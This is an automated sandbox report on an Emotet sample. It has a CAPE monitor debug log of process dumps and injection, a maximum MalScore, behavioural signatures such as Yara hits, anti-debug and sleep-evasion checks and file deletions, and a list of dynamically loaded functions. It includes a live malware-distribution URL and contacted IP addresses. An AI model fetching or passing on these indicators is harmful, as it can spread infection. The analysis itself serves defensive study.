2019-02-11 14:56:02,213 [root] DEBUG: Process dumps enabled.
2019-02-11 14:56:02,213 [root] DEBUG: DLL loaded at 0x72C60000: C:\Windows\system32\WINHTTP (0x58000 bytes).
2019-02-11 14:56:02,229 [root] DEBUG: DLL loaded at 0x72C10000: C:\Windows\system32\webio (0x4f000 bytes).
2019-02-11 14:56:02,229 [root] INFO: Disabling sleep skipping.
2019-02-11 14:56:02,244 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1500 at 0x74940000, image base 0x9d0000, stack from 0x426000-0x430000
2019-02-11 14:56:02,244 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\dafpanes.exe".
2019-02-11 14:56:02,244 [root] INFO: Monitor successfully loaded in process with pid 1500.
2019-02-11 14:56:02,259 [root] DEBUG: set_caller_info: Adding region at 0x001A0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:56:02,338 [root] DEBUG: set_caller_info: Adding region at 0x001C0000 to caller regions list (kernel32::CreateToolhelp32Snapshot).
2019-02-11 14:56:02,338 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2156
2019-02-11 14:56:08,921 [root] DEBUG: DLL unloaded from 0x740F0000.
2019-02-11 14:56:08,921 [root] DEBUG: GetHookCallerBase: thread 2128 (handle 0x0), return address 0x0042F606, allocation base 0x00420000.
2019-02-11 14:56:10,918 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00420000.
2019-02-11 14:56:10,964 [root] DEBUG: set_caller_info: Adding region at 0x0000000002780000 to caller regions list (setupapi::SetupDiGetDeviceRegistryPropertyW).
2019-02-11 14:56:10,964 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00420000.
2019-02-11 14:56:10,996 [root] DEBUG: set_caller_info: Adding region at 0x0000000001F30000 to caller regions list (kernel32::DeviceIoControl).
2019-02-11 14:56:11,059 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000F5E0.
2019-02-11 14:56:11,089 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2156_2048852088432111122019
2019-02-11 14:56:11,089 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x14200.
2019-02-11 14:56:11,198 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x009D0000.
2019-02-11 14:56:11,198 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x009D0000.
2019-02-11 14:56:11,246 [root] DEBUG: DumpProcess: Module entry point VA is 0x00012EBE.
2019-02-11 14:56:11,558 [root] DEBUG: DLL loaded at 0x69820000: C:\Windows\System32\msxml3 (0x133000 bytes).
2019-02-11 14:56:11,558 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2156_1162400714432111122019
2019-02-11 14:56:11,558 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x72e00.
2019-02-11 14:56:11,588 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:56:11,588 [root] INFO: Notified of termination of process with pid 2156.
2019-02-11 14:56:11,621 [root] WARNING: Unable to open termination event for pid 2156.
2019-02-11 14:56:11,683 [root] DEBUG: DLL loaded at 0x000007FEF74C0000: c:\windows\system32\mmcss (0x1d000 bytes).
2019-02-11 14:56:11,683 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3032
2019-02-11 14:56:11,713 [root] DEBUG: DLL loaded at 0x000007FEFB9F0000: c:\windows\system32\AVRT (0x9000 bytes).
2019-02-11 14:56:11,713 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF74C0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-02-11 14:56:11,713 [root] INFO: Announced starting service "WerSvc"
2019-02-11 14:56:11,776 [root] DEBUG: GetHookCallerBase: thread 1240 (handle 0x0), return address 0x0040F606, allocation base 0x00400000.
2019-02-11 14:56:11,776 [root] DEBUG: DLL unloaded from 0x000007FEF74C0000.
2019-02-11 14:56:11,776 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00400000.
2019-02-11 14:56:11,869 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-02-11 14:56:11,933 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000F5E0.
2019-02-11 14:56:11,933 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1376
2019-02-11 14:56:11,979 [root] INFO: Added new process to list with pid: 1376
2019-02-11 14:56:11,979 [root] INFO: Process with pid 2156 has terminated
2019-02-11 14:56:11,979 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:56:11,994 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:56:12,010 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\3032_184203601382011122019
2019-02-11 14:56:12,010 [root] DEBUG: DLL unloaded from 0x000007FEF9B80000.
2019-02-11 14:56:12,026 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1376
2019-02-11 14:56:12,026 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x16e00.
2019-02-11 14:56:12,042 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:56:12,042 [root] DEBUG: Process dumps enabled.
2019-02-11 14:56:12,119 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:56:12,119 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x009D0000.
2019-02-11 14:56:12,134 [root] INFO: Disabling sleep skipping.
2019-02-11 14:56:12,151 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x009D0000.
2019-02-11 14:56:12,167 [root] DEBUG: DumpProcess: Module entry point VA is 0x00012EBE.
2019-02-11 14:56:12,167 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\credssp (0x8000 bytes).
2019-02-11 14:56:12,167 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:56:12,167 [root] DEBUG: DLL unloaded from 0x74C70000.
2019-02-11 14:56:12,197 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2019-02-11 14:56:12,213 [root] WARNING: Unable to hook LockResource
2019-02-11 14:56:12,229 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\3032_20697310062382011122019
2019-02-11 14:56:12,290 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-02-11 14:56:12,354 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1376 at 0x0000000074000000, image base 0x00000000FFA10000, stack from 0x00000000001C5000-0x00000000001D0000
2019-02-11 14:56:12,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x72e00.
2019-02-11 14:56:12,431 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-02-11 14:56:12,431 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k WerSvcGroup.
2019-02-11 14:56:12,431 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:56:12,447 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-02-11 14:56:12,525 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:56:12,525 [root] INFO: Monitor successfully loaded in process with pid 1376.
2019-02-11 14:56:12,540 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2019-02-11 14:56:12,540 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:56:12,572 [root] DEBUG: DLL unloaded from 0x74870000.
2019-02-11 14:56:12,618 [root] DEBUG: DLL unloaded from 0x000007FEFC4C0000.
2019-02-11 14:56:12,618 [root] INFO: Notified of termination of process with pid 3032.
2019-02-11 14:56:12,650 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-02-11 14:56:12,665 [root] DEBUG: DLL loaded at 0x000007FEF9C40000: c:\windows\system32\wersvc (0x18000 bytes).
2019-02-11 14:56:12,727 [root] DEBUG: DLL loaded at 0x000007FEF9930000: c:\windows\system32\mmcss (0x1d000 bytes).
2019-02-11 14:56:12,727 [root] DEBUG: DLL unloaded from 0x000007FEF9C40000.
2019-02-11 14:56:12,743 [root] DEBUG: DLL loaded at 0x000007FEFB9F0000: c:\windows\system32\AVRT (0x9000 bytes).
2019-02-11 14:56:12,775 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9930000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-02-11 14:56:12,775 [root] DEBUG: DLL unloaded from 0x000007FEF9930000.
2019-02-11 14:56:13,039 [root] INFO: Process with pid 3032 has terminated
2019-02-11 14:56:15,443 [root] DEBUG: DLL unloaded from 0x000007FEFA1C0000.
2019-02-11 14:56:23,009 [root] DEBUG: DLL unloaded from 0x000007FEF9B80000.
2019-02-11 14:56:23,009 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\shell32 (0xc4a000 bytes).
2019-02-11 14:56:28,983 [root] DEBUG: DLL loaded at 0x74A00000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-02-11 14:56:39,061 [root] DEBUG: DLL loaded at 0x73E60000: C:\Windows\SysWOW64\schannel (0x3a000 bytes).
2019-02-11 14:56:39,295 [root] DEBUG: set_caller_info: Adding region at 0x73E60000 to caller regions list (ntdll::LdrLoadDll).
2019-02-11 14:56:40,075 [root] DEBUG: DLL loaded at 0x73FF0000: C:\Windows\system32\secur32 (0x8000 bytes).
2019-02-11 14:56:47,032 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list (ntdll::NtDuplicateObject).
2019-02-11 14:56:47,032 [root] DEBUG: set_caller_info: Adding region at 0x73FF0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-02-11 14:56:47,078 [root] DEBUG: DLL loaded at 0x73FD0000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-02-11 14:56:48,872 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2019-02-11 14:56:48,936 [root] DEBUG: DLL loaded at 0x72BD0000: C:\Windows\system32\ncrypt (0x38000 bytes).
2019-02-11 14:56:48,983 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-02-11 14:56:49,122 [root] DEBUG: DLL loaded at 0x73E10000: C:\Windows\system32\bcrypt (0x17000 bytes).
2019-02-11 14:56:49,138 [root] DEBUG: DLL loaded at 0x73DF0000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-02-11 14:56:49,388 [root] DEBUG: set_caller_info: Adding region at 0x73E10000 to caller regions list (ntdll::memcpy).
2019-02-11 14:56:49,450 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-02-11 14:56:49,700 [root] DEBUG: set_caller_info: Adding region at 0x72BD0000 to caller regions list (ntdll::memcpy).
2019-02-11 14:56:49,763 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:56:49,903 [root] DEBUG: DLL loaded at 0x699F0000: C:\Windows\SysWOW64\bcryptprimitives (0x3d000 bytes).
2019-02-11 14:56:50,167 [root] DEBUG: set_caller_info: Adding region at 0x699F0000 to caller regions list (ntdll::memcpy).
2019-02-11 14:56:50,433 [root] DEBUG: DLL loaded at 0x73FD0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-02-11 14:56:50,605 [root] DEBUG: set_caller_info: Adding region at 0x73FD0000 to caller regions list (ntdll::LdrLoadDll).
2019-02-11 14:56:51,338 [root] DEBUG: DLL loaded at 0x699D0000: C:\Windows\system32\GPAPI (0x16000 bytes).
2019-02-11 14:56:51,572 [root] DEBUG: set_caller_info: Adding region at 0x699D0000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:56:52,446 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-02-11 14:56:53,117 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-02-11 14:56:53,351 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:56:53,819 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-02-11 14:56:54,677 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-02-11 14:56:55,051 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-02-11 14:56:55,253 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-02-11 14:56:56,438 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-02-11 14:56:56,766 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:56:57,437 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-02-11 14:56:57,858 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-02-11 14:56:57,875 [root] DEBUG: DLL loaded at 0x699B0000: C:\Windows\system32\cryptnet (0x1c000 bytes).
2019-02-11 14:56:57,890 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-02-11 14:56:57,890 [root] DEBUG: set_caller_info: Adding region at 0x699B0000 to caller regions list (ntdll::LdrLoadDll).
2019-02-11 14:56:57,890 [root] DEBUG: DLL loaded at 0x740F0000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-02-11 14:56:57,890 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-02-11 14:56:57,905 [root] DEBUG: DLL unloaded from 0x74220000.
2019-02-11 14:56:57,921 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-02-11 14:56:57,953 [root] DEBUG: DLL unloaded from 0x72C60000.
2019-02-11 14:56:57,953 [root] DEBUG: DLL unloaded from 0x740F0000.
2019-02-11 14:56:57,953 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:56:58,015 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:56:58,015 [root] DEBUG: DLL unloaded from 0x72C60000.
2019-02-11 14:56:59,075 [root] DEBUG: DLL unloaded from 0x699B0000.
2019-02-11 14:56:59,232 [root] DEBUG: DLL loaded at 0x69800000: C:\Windows\system32\Cabinet (0x15000 bytes).
2019-02-11 14:56:59,279 [root] DEBUG: set_caller_info: Adding region at 0x69800000 to caller regions list (ntdll::memcpy).
2019-02-11 14:56:59,293 [root] DEBUG: DLL loaded at 0x73F80000: C:\Windows\system32\DEVRTL (0xe000 bytes).
2019-02-11 14:56:59,371 [root] DEBUG: DLL unloaded from 0x75A70000.
2019-02-11 14:56:59,903 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:56:59,948 [root] DEBUG: DLL unloaded from 0x72C60000.
2019-02-11 14:56:59,964 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:56:59,980 [root] DEBUG: DLL unloaded from 0x72C60000.
2019-02-11 14:57:00,994 [root] DEBUG: DLL unloaded from 0x699B0000.
2019-02-11 14:57:01,165 [root] DEBUG: DLL unloaded from 0x75A70000.
2019-02-11 14:57:24,785 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-02-11 14:57:24,878 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-02-11 14:57:24,986 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-02-11 14:57:24,986 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB0D0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-02-11 14:57:25,003 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-02-11 14:57:26,812 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-02-11 14:57:27,030 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-02-11 14:57:27,467 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-02-11 14:57:27,529 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-02-11 14:57:30,509 [root] DEBUG: DLL loaded at 0x74A00000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-02-11 14:57:30,930 [root] DEBUG: DLL unloaded from 0x72C60000.
2019-02-11 14:57:30,930 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:57:31,243 [root] DEBUG: DLL loaded at 0x697A0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-02-11 14:57:31,321 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-02-11 14:57:31,585 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-02-11 14:57:31,944 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-02-11 14:57:32,069 [root] DEBUG: DLL unloaded from 0x74340000.
2019-02-11 14:57:32,381 [root] DEBUG: DLL unloaded from 0x74A50000.
2019-02-11 14:57:43,068 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:57:43,973 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-02-11 14:57:44,456 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4E10000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:57:57,108 [root] DEBUG: DLL unloaded from 0x697A0000.
2019-02-11 14:58:03,301 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:58:03,301 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:58:09,197 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:58:17,309 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1376
2019-02-11 14:58:18,198 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-02-11 14:58:18,635 [root] DEBUG: GetHookCallerBase: thread 2180 (handle 0x0), return address 0x00000000FFA11D42, allocation base 0x00000000FFA10000.
2019-02-11 14:58:18,931 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FFA10000.
2019-02-11 14:58:19,056 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA10000.
2019-02-11 14:58:19,431 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2019-02-11 14:58:19,961 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-02-11 14:58:25,094 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\1376_7689347939382011122019
2019-02-11 14:58:25,344 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6800.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-02-11 14:54:08 2019-02-11 14:58:51

URL Details

URL
http://allopizzanuit.fr/mm.microsoft.ms/med/event/dNhfd4yt/dNhfd4yt

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat -> New: C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2076 trigged the Yara rule 'Emotet'
Hit: PID 3032 trigged the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: iexplore.exe, PID 3028
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E84ED3A5-2E0C-11E9-8662-000C2940B9FB}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\875991CB.czSJPY5
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
DeletedFile: C:\Users\user\AppData\Local\Temp\CabF299.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarF29A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabF3E3.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarF3E4.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabF9FD.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarF9FE.tmp
DeletedFile: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2708.23433393
DeletedFile: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2708.23433393
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2708.23433393
DeletedFile: C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
DeletedFile: C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
DeletedFile: C:\Windows\SysWOW64\compareiface.exe
DeletedFile: C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
DeletedFile: C:\Windows\SysWOW64\compareiface.exe
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: WINWORD.EXE tried to sleep 270 seconds, actually delayed analysis time by 0 seconds
Process: OSPPSVC.EXE tried to sleep 300 seconds, actually delayed analysis time by 0 seconds
Attempts to connect to a dead IP:Port (6 unique times)
IP: 145.239.74.67:80 (France)
IP: 204.79.197.200:80 (United States)
IP: 23.49.13.56:80 (United States)
IP: 65.52.98.231:443 (United States)
IP: 8.253.133.120:80 (United States)
IP: 104.112.180.173:80 (United States)
Dynamic (imported) function loading detected
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: comctl32.dll/LoadIconWithScaleDown
DynamicLoader: IEUI.dll/InitGadgets
DynamicLoader: ieproxy.dll/DllGetClassObject
DynamicLoader: ieproxy.dll/DllCanUnloadNow
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: propsys.dll/PSGetPropertyKeyFromName
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: USER32.dll/MsgWaitForMultipleObjectsEx
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsAppThemed
DynamicLoader: comctl32.dll/ImageList_LoadImageW
DynamicLoader: comctl32.dll/ImageList_GetIconSize
DynamicLoader: UxTheme.dll/IsCompositionActive
DynamicLoader: UxTheme.dll/SetWindowTheme
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: comctl32.dll/ImageList_Create
DynamicLoader: comctl32.dll/ImageList_ReplaceIcon
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/ImageList_AddMasked
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: MSCTF.dll/SetInputScopes2
DynamicLoader: UxTheme.dll/EnableThemeDialogTexture
DynamicLoader: urlmon.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: IEUI.dll/CreateGadget
DynamicLoader: IEUI.dll/SetGadgetMessageFilter
DynamicLoader: IEUI.dll/SetGadgetStyle
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PSPropertyBag_WriteGUID
DynamicLoader: propsys.dll/PSPropertyBag_ReadGUID
DynamicLoader: IEUI.dll/SetGadgetRootInfo
DynamicLoader: xmllite.dll/CreateXmlReader
DynamicLoader: xmllite.dll/CreateXmlReaderInputWithEncodingName
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: IEUI.dll/FindStdColor
DynamicLoader: IEUI.dll/InvalidateGadget
DynamicLoader: IEUI.dll/SetGadgetParent
DynamicLoader: IEUI.dll/GetGadgetTicket
DynamicLoader: IEUI.dll/SetGadgetRect
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: kernel32.dll/GetThreadUILanguage
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: SHELL32.dll/SHGetInstanceExplorer
DynamicLoader: WININET.dll/InternetSetOptionW
DynamicLoader: USER32.dll/PostMessageW
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringBindingParseW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/I_RpcBindingInqLocalClientPID
DynamicLoader: RPCRT4.dll/RpcServerInqCallAttributesW
DynamicLoader: RPCRT4.dll/RpcImpersonateClient
DynamicLoader: RPCRT4.dll/RpcRevertToSelf
DynamicLoader: RPCRT4.dll/NdrServerCall2
DynamicLoader: RPCRT4.dll/RpcBindingInqObject
DynamicLoader: IEUI.dll/PeekMessageExW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: msfeeds.dll/MsfeedsCreateInstance
DynamicLoader: SHELL32.dll/SHGetSpecialFolderPathW
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: SHELL32.dll/SHCreateDirectoryExW
DynamicLoader: WININET.dll/FindFirstUrlCacheContainerW
DynamicLoader: WININET.dll/FindNextUrlCacheContainerW
DynamicLoader: WININET.dll/FindCloseUrlCache
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: MSIMG32.dll/GradientFill
DynamicLoader: GDI32.dll/GetTextExtentExPointWPri
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/SendMessageW
